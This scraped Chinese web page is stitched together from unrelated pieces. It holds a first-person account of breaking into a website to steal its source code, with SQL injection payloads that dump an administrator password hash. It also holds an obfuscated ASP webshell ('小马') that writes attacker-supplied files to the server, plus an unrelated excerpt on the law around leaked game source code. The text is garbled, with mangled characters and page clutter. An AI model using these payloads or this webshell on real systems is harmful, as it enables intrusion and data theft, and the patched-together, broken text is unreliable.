获取网页源代码游戏源代码要入侵吗

一次曲折入侵拿源代码过程(1)
当前位置:>>>>文章内容
一次曲折入侵拿源代码过程(1)
来源:www.vfcocus.net 作者:vfocus 发布时间:
一日晚,同学丢来个网址说要源代码+数据,当时有时间就打开看了下,网站是.net脚本,也不知道是采用的什么整站系统可能是找人做的,就简单的在几个带参数连接页面提交单引号,并没有返回想要的东东,
用wwwscan扫描敏感目录,结果什么都没有扫描到
然后用Acunetix Web Vulnerability Scanner 6扫描了下,没有什么可用的东东,扫描到一个bbs目录 ,
打开看了下是Discuz!NT2.5的,用弱口令尝试登陆失败,记得这个版本之前暴过漏洞(showuser.aspx的ordertype参数未经过滤),不过我只成功过一次都是很久以前了。看了下会员数不少,估计这论坛打了补丁,决定绕道~,旁注开始了
用super injection超级旁注工具来旁注检测,服务器上十几个 站,
不像是虚拟主机 所以觉得有把握提权,首先载入查询站点后批量扫描数据库,有几个站存在备份的文件和数据库但是几百M,网速不够快就懒得 下载了
然后批量检测注入点,结果什么 也米有,
然后扫描批量后台和敏感目录,扫到一个网站后台admin,
去掉admin来到网站根目录,发现还有带参数的php链接,于是再简单的进行注入测试,返回&连接超 时&&&&,
接连尝试了几个网站都没有扫描到后台目录
于是开始挨个检测,当打开其中一个站的时候,发现有个搜索文本框,搜索1& 根据页面返回信息貌似有注入漏洞,虽然米有找到后台,还是先找出管理员密码再说,说不定其 他地方有用。
我用winsockexpert工具抓包然后构造注入点用pangolin 射之但是提示米有检测到漏洞,看来还是来手工了,网站上面的搜索文本框限制了字符长度,于是将html网页保存到本地,将无用的代码去掉,把action提交的search.asp改成,将文本框长度适当增加,再来接着搜索 1&and @@ve rsion=0&
提交后返回mssql 版本信息如下图所示
再搜索1&and(select password from admin)&0--就直接爆出 了管理员md5密码,
一击就中,感觉不错。呵呵, 先在线查询之然后到前台找联系方式什么的混合起来尝试登陆ftp,还是失败
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
&§最新评论:
CopyRight&&&
All Rights Reserved日志总数:1584 篇
评论总数:1516 篇
标签数量:3300 个
链接总数:11 个
建站日期:
运行天数:1003 天
最后更新:网站入侵拿webshell&(暗组技术论坛专用小马)源代码
darkst="!黎!ejn!pckGTP!黎!ejn!gebub!黎!ejn!pckDpvouGjmf!黎!po!fssps!sftvnf!ofyu!黎!Tfu!pckGTP!&!Tfswfs/DsfbufPckfdu)#Tdsjqujoh/GjmfTztufnPckfdu#*!黎!jg!Usjn)sfrvftu)#tztufnqbui#**=?##!uifo!黎!gebub!&!sfrvftu)#tBwfebub#*!黎!Tfu!pckDpvouGjmf&pckGTP/DsfbufUfyuGjmf)sfrvftu)#tztufnqbui#*-Usvf*!黎!pckDpvouGjmf/Xsjuf!gebub!黎!jg!fss!&1!uifo!黎!sftqpotf/xsjuf!#=gpou!dpmps&sfe?保存成功""=0gpou?#!黎!fmtf!黎!sftqpotf/xsjuf!#=gpou!dpmps&sfe?保存失败""=0gpou?#!黎!foe!jg!黎!fss/dmfbs!黎!foe!jg!黎!pckDpvouGjmf/Dmptf!黎!Tfu!pckDpvouGjmf&Opuijoh!黎!Tfu!pckGTP!&!Opuijoh!黎!Sftqpotf/xsjuf!#=ujumf?暗组技术论坛专用小马!!Cz;Ofx5=0Ujumf?#黎!Sftqpotf/xsjuf!#=gpsn!bdujpo&((!nfuipe&qptu?#!黎!Sftqpotf/xsjuf!#保存文件的=gpou!dpmps&sfe?绝对路径)包括文件名;如E;]xfc]y/btq*;=0gpou?#!黎!Sftqpotf/Xsjuf!#=joqvu!uzqf&ufyu!obnf&tztufnqbui!xjeui&43!tj{f&61?#!黎!Sftqpotf/Xsjuf!#=cs?#!黎!Sftqpotf/xsjuf!#本文件绝对路径#!黎!Sftqpotf/xsjuf!tfswfs/nbqqbui)Sfrvftu/TfswfsWbsjbcmft)#TDSJQU`OBNF#**!黎!Sftqpotf/xsjuf!#=cs?#!黎!Sftqpotf/xsjuf!#输入马的内容;#!黎!Sftqpotf/xsjuf!#=ufyubsfb!obnf&tBwfebub!dpmt&91!spxt&21!xjeui&43?=0ufyubsfb?#!黎!Sftqpotf/xsjuf!#=joqvu!uzqf&tvcnju!wbmvf&保存?#!黎!Sftqpotf/xsjuf!#=0gpsn?#!黎"
execute(UnEncode(darkst))
function UnEncode(temp)
for i = 1 to len(temp)
if mid(temp,i,1)&&"黎" then
&&&&&&&&&&&&
If Asc(Mid(temp, i, 1)) & 32 Or Asc(Mid(temp, i, 1))
& 126 Then
&&&&&&&&&&&&&&&&
a = a & Chr(Asc(Mid(temp, i, 1)))
&&&&&&&&&&&&
&&&&&&&&&&&&&&&&
pk=asc(mid(temp,i,1))-but
&&&&&&&&&&&&&&&&
if pk&126 then
&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&
elseif pk&32 then
&&&&&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&
&&&&&&&&&&&&&&&&
a=a&chr(pk)
&&&&&&&&&&&&
&&&&&&&&&&&&
a=a&vbcrlf
UnEncode=a
end function
已投稿到:
以上网友发言只代表其个人观点,不代表新浪网的观点或立场。君,已阅读到文档的结尾了呢~~
泄露游戏源代码的严重性。(相关法律知识及案例)。为了防止因员工将公司开发的网络游戏的源代码泄露或擅自复制设立私服,进而导致公司遭受不可逆转的经济损失;公司欲向员工普及相关法律知识,从而使员工能够了解私自泄露源代码的严重性,提高其自身职业素养。。I. 网络游戏源代码概述。网络游戏,英文名称为Online Game,又称 “在线游戏”,简称“网游”。指以互联网为传输媒介,以游戏运营商服务器和用户计算机为..
扫扫二维码,随身浏览文档
手机或平板扫扫即可继续访问
泄露游戏源代码的严重
举报该文档为侵权文档。
举报该文档含有违规或不良信息。
反馈该文档无法正常浏览。
举报该文档为重复文档。
推荐理由:
将文档分享至:
分享完整地址
文档地址:
粘贴到BBS或博客
flash地址:
支持嵌入FLASH地址的网站使用
html代码:
&embed src='/DocinViewer-4.swf' width='100%' height='600' type=application/x-shockwave-flash ALLOWFULLSCREEN='true' ALLOWSCRIPTACCESS='always'&&/embed&
450px*300px480px*400px650px*490px
支持嵌入HTML代码的网站使用
您的内容已经提交成功
您所提交的内容需要审核后才能发布,请您等待!
3秒自动关闭窗口

我要回帖

更多关于 php获取网页源代码 的文章

 

随机推荐